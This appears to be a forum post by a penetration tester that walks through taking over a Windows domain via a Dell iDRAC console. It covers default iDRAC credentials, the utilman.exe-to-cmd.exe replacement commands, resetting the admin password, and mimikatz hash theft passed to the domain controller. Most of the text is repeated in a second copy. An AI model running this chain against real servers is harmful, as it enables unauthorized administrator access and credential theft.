03-14-2025, 03:06 PM
(This post was last modified: 03-14-2025, 03:07 PM by rumprump111.)
Well, the other day I participated in an interesting penetration test and implemented an interesting way to escalate privileges to Domain Administrator. So I decided to replicate the scenario on my own bench to share this interesting way with fellow pentesters who can replicate this path.
Let's start by defining what is iDRAC? Let's use an artificial intelligence-generated clue: “The Dell Integrated Remote Access Controller (iDRAC) is a tool that allows IT administrators to remotely or locally manage, monitor, and upgrade Dell PowerEdge servers. The iDRAC is a mainboard management controller built into Dell servers that includes both hardware and software.” Essentially, with it, you have the ability to control your virtual machine!
Typically, these interfaces are login and password protected, but pentests can reveal that default credentials are being used or there are vulnerable IPMI v2.0 password hashes. So, let's say you found the default credentials, which are usually root:calvin, or let's say you cracked a hash obtained through a vulnerability in IPMI. What's next? For reference, once you have successfully logged into iDRAC, you will see the following:
![[Image: c73daf50c3dd1324a2510f09f7526467.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/c73/daf/50c/c73daf50c3dd1324a2510f09f7526467.png)
When you look at the screen above, what do you think your options are? How about waiting for the administrator to click on the virtual console screen in the lower right corner and log in so you can take advantage of this? Acceptable method, but we want to achieve the highest level of privileges in Active Directory. So let's make it happen!
If you have any experience with back-end infrastructure, you know that you can reset the built-in Windows Server administrator account using utilman. Now let's go back to the screenshot above. We can see that this is a Windows Server 2016 operating system, with the same Windows architecture, just on a different platform. So, if we apply the utilman reset method to it, then in theory, it should work, right? Let's get started!
The iDRAC architecture requires that we plug in virtual media to perform this reset. Let's download an ISO image of Windows Server 2016, and then plug it into our operating system in iDRAC. I've added a few marks to the screenshot so you can see the steps to take after successfully downloading the ISO.
1) Load.
2) We mark it up.
3) Then we close the dialog.
![[Image: f2fbfeed73af0c3e703e16fd75d4c029.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/f2f/bfe/ed7/f2fbfeed73af0c3e703e16fd75d4c029.png)
Now that we've done that, let's click on “Boot Сontrols” and select the highlighted option below. This tells iDRAC to boot from the ISO we just added:
![[Image: a0912a822d3ba9c98309e69e8a939f8c.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/a09/12a/822/a0912a822d3ba9c98309e69e8a939f8c.png)
Shutting down the system:
![[Image: a293526c6f81b25a6889b3cb56df9eaa.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/a29/352/6c6/a293526c6f81b25a6889b3cb56df9eaa.png)
Reboot and you will encounter a screen like the screenshot below, where we will click the highlighted option:
![[Image: cdd57dd733f3bab19273f0c004b20726.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/cdd/57d/d73/cdd57dd733f3bab19273f0c004b20726.png)
We will then be presented with another screen, we will click on the highlighted option below:
![[Image: 5c0dbe73c7485c96cc0b8a057ab0086a.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/5c0/dbe/73c/5c0dbe73c7485c96cc0b8a057ab0086a.png)
We should end up here (make sure you're in the right directory):
![[Image: a7c27f245edaafb5f98e5aa06fdf0c31.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/a7c/27f/245/a7c27f245edaafb5f98e5aa06fdf0c31.png)
Now let's go to the system32 directory and run some commands. Please take a look at the screenshot below:
![[Image: 17cc371073753e7bcdb49ea276f27fb8.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/17c/c37/107/17cc371073753e7bcdb49ea276f27fb8.png)
Let me tell you about what we do:
We're renaming our utilman.exe to utilman.123, essentially we're backing it up so we can bring it back once we complete our task.
Now we take and replace utilman.exe with the command line (cmd.exe).
When this is done, type “exit” and boot Windows normally. Once this is done, you should end up here:
![[Image: 9fbde1601318bac61bce105077f03406.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/9fb/de1/601/9fbde1601318bac61bce105077f03406.png)
Click on the highlighted option, and now your Special Features option should bring up a command prompt where we will reset the built-in administrator account:
![[Image: 7497a3df8d1128e449017db12fbbb188.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/749/7a3/df8/7497a3df8d1128e449017db12fbbb188.png)
If you are facing a domain controller, just add /domain to the end of the command we entered. Now let's enter the new password and see if we log in:
![[Image: f3276b286030b35f17a93d8a01fcd7d8.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/f32/76b/286/f3276b286030b35f17a93d8a01fcd7d8.png)
If you were lucky and it was a domain controller, you are now a domain administrator and can continue to enjoy the pentest. Honestly, for obvious reasons, you shouldn't be doing this on a domain controller during a pentest.
I wasn't so lucky. In my case, it was a domain-joined machine. With the hope that domain admins sometimes interact with it, I downloaded mimikatz and tried to get the domain admin hash:
![[Image: 76908b884dbf78c079503940a77b0c25.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/769/08b/884/76908b884dbf78c079503940a77b0c25.png)
Take that hash and log in to the domain controller, congratulations, you are a domain administrator:
![[Image: 2677a55279a94cb7d8ede604bd074ade.png]](https://external-content.duckduckgo.com/iu/?u=https://habrastorage.org/r/w1560/getpro/habr/upload_files/267/7a5/527/2677a55279a94cb7d8ede604bd074ade.png)
Keep in mind that there are other options (like DCSync). It's entirely up to you.
I have omitted some steps. For example, as we know, during testing we may encounter security tools that can hinder us. You will have to use your skills to bypass them and run the necessary tools (such as mimikatz) to get to the target. This was one of the problems I encountered. Also, to keep the blog from getting too long, I eliminated the step of undoing the changes I made.
Have a great hack!
Let's start by defining what is iDRAC? Let's use an artificial intelligence-generated clue: “The Dell Integrated Remote Access Controller (iDRAC) is a tool that allows IT administrators to remotely or locally manage, monitor, and upgrade Dell PowerEdge servers. The iDRAC is a mainboard management controller built into Dell servers that includes both hardware and software.” Essentially, with it, you have the ability to control your virtual machine!
Typically, these interfaces are login and password protected, but pentests can reveal that default credentials are being used or there are vulnerable IPMI v2.0 password hashes. So, let's say you found the default credentials, which are usually root:calvin, or let's say you cracked a hash obtained through a vulnerability in IPMI. What's next? For reference, once you have successfully logged into iDRAC, you will see the following:
When you look at the screen above, what do you think your options are? How about waiting for the administrator to click on the virtual console screen in the lower right corner and log in so you can take advantage of this? Acceptable method, but we want to achieve the highest level of privileges in Active Directory. So let's make it happen!
If you have any experience with back-end infrastructure, you know that you can reset the built-in Windows Server administrator account using utilman. Now let's go back to the screenshot above. We can see that this is a Windows Server 2016 operating system, with the same Windows architecture, just on a different platform. So, if we apply the utilman reset method to it, then in theory, it should work, right? Let's get started!
The iDRAC architecture requires that we plug in virtual media to perform this reset. Let's download an ISO image of Windows Server 2016, and then plug it into our operating system in iDRAC. I've added a few marks to the screenshot so you can see the steps to take after successfully downloading the ISO.
1) Load.
2) We mark it up.
3) Then we close the dialog.
Now that we've done that, let's click on “Boot Сontrols” and select the highlighted option below. This tells iDRAC to boot from the ISO we just added:
Shutting down the system:
Reboot and you will encounter a screen like the screenshot below, where we will click the highlighted option:
We will then be presented with another screen, we will click on the highlighted option below:
We should end up here (make sure you're in the right directory):
Now let's go to the system32 directory and run some commands. Please take a look at the screenshot below:
Let me tell you about what we do:
ren utilman.exe utilman.123We're renaming our utilman.exe to utilman.123, essentially we're backing it up so we can bring it back once we complete our task.
copy cmd.exe utilman.exeNow we take and replace utilman.exe with the command line (cmd.exe).
When this is done, type “exit” and boot Windows normally. Once this is done, you should end up here:
Click on the highlighted option, and now your Special Features option should bring up a command prompt where we will reset the built-in administrator account:
If you are facing a domain controller, just add /domain to the end of the command we entered. Now let's enter the new password and see if we log in:
If you were lucky and it was a domain controller, you are now a domain administrator and can continue to enjoy the pentest. Honestly, for obvious reasons, you shouldn't be doing this on a domain controller during a pentest.
I wasn't so lucky. In my case, it was a domain-joined machine. With the hope that domain admins sometimes interact with it, I downloaded mimikatz and tried to get the domain admin hash:
Take that hash and log in to the domain controller, congratulations, you are a domain administrator:
Keep in mind that there are other options (like DCSync). It's entirely up to you.
I have omitted some steps. For example, as we know, during testing we may encounter security tools that can hinder us. You will have to use your skills to bypass them and run the necessary tools (such as mimikatz) to get to the target. This was one of the problems I encountered. Also, to keep the blog from getting too long, I eliminated the step of undoing the changes I made.
Have a great hack!
